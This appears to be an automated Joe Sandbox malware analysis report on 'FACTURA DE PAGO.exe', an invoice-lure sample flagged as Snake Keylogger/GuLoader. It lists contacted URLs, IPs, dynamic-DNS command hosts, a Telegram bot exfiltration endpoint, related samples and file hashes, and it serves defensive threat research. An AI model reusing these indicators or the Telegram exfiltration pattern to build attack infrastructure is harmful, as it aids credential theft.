                                            http://nsis.sf.net/NSIS_ErrorErrorFACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000004.00000002.2931722428.00000000210C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://reallyfreegeoip.org/xml/155.94.241.186$msiexec.exe, 00000004.00000002.2931722428.0000000020FBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F7A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://varders.kozow.com:8081msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://aborters.duckdns.org:8081msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://www.google.commsiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://nsis.sf.net/NSIS_ErrorFACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://crl.micropowershell.exe, 00000001.00000002.1906039371.0000000006EA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://drive.google.com/msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://anotherarmy.dns.army:8081msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://contoso.com/powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000004.00000002.2931722428.00000000210BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://drive.usercontent.google.com/j$vmsiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://reallyfreegeoip.orgmsiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://apis.google.commsiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUtrue
                                                                  188.114.97.3
                                                                  reallyfreegeoip.orgEuropean Union
                                                                  13335CLOUDFLARENETUStrue
                                                                  193.122.6.168
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  142.250.186.33
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  216.58.206.46
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1538465
                                                                  Start date and time:2024-10-21 11:15:23 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 33s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:9
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:FACTURA DE PAGO.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@6/14@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 33.3%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 149
                                                                  • Number of non-executed functions: 65
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target msiexec.exe, PID 7864 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7460 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  05:16:15API Interceptor41x Sleep call for process: powershell.exe modified
                                                                  05:16:53API Interceptor548566x Sleep call for process: msiexec.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  SecuriteInfo.com.Win64.Malware-gen.32485.11504.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                    Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      188.114.97.3http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                      • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                      • servicetelemetryserver.shop/api/index.php
                                                                                      SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                      • servicetelemetryserver.shop/api/index.php
                                                                                      SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                      • servicetelemetryserver.shop/api/index.php
                                                                                      ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                                                                                      • tipinfodownload-soft1.com/g9jvjfd73/index.php
                                                                                      aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                                      • main.dsn.ovh/dns/loadbit
                                                                                      PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.freedietbuilder.online/nnla/
                                                                                      NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                      • www.ergeneescortg.xyz/guou/
                                                                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                      • filetransfer.io/data-package/DyuQ5y15/download
                                                                                      Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                                                                      • dsye.shop/DS341/index.php
                                                                                      193.122.6.168PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      NEW CUSTOMER ORDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      KIDy5J5su4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Dekont-20241017-1100.00EFT-18901459.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      yugozxcvb.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      ACCOUNTXSTATEMENT.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      14 EK#U0130M 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      reallyfreegeoip.orgPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      checkip.dyndns.comPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      api.telegram.orgPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      SecuriteInfo.com.Win64.Malware-gen.32485.11504.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                      • 149.154.167.220
                                                                                      Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ORACLE-BMC-31898USPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                      • 130.61.149.67
                                                                                      LNLAncf2v5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 150.136.183.134
                                                                                      SecuriteInfo.com.Win32.TrojanX-gen.28573.1762.exeGet hashmaliciousUnknownBrowse
                                                                                      • 168.138.162.78
                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                      • 130.61.64.122
                                                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                      • 140.238.9.118
                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                      • 129.146.244.172
                                                                                      TELEGRAMRUPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      CLOUDFLARENETUSPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                      • 172.67.206.204
                                                                                      http://www.5movierulz.momGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.72.9
                                                                                      http://lvlup.pageGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.184.158
                                                                                      http://google.comGet hashmaliciousUnknownBrowse
                                                                                      • 172.64.41.3
                                                                                      https://bbs-file.jiaxiao.pub/94f0e5e6a233429db4c5be400e2eb471/post/2024/03/29/933660672770703360.zipGet hashmaliciousUnknownBrowse
                                                                                      • 1.1.1.1
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.206.204
                                                                                      rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 172.67.155.139
                                                                                      Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 104.26.13.205
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                      • 104.21.53.8
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9adPAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      SecuriteInfo.com.Win32.DropperX-gen.11998.28068.exeGet hashmaliciousAtlantida StealerBrowse
                                                                                      • 188.114.97.3
                                                                                      rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      3b5074b1b5d032e5620f69f9f700ff0ePAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9Get hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e19PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 142.250.186.33
                                                                                      • 216.58.206.46
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):14744
                                                                                      Entropy (8bit):4.992175361088568
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                      MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                      SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                      SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                      SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
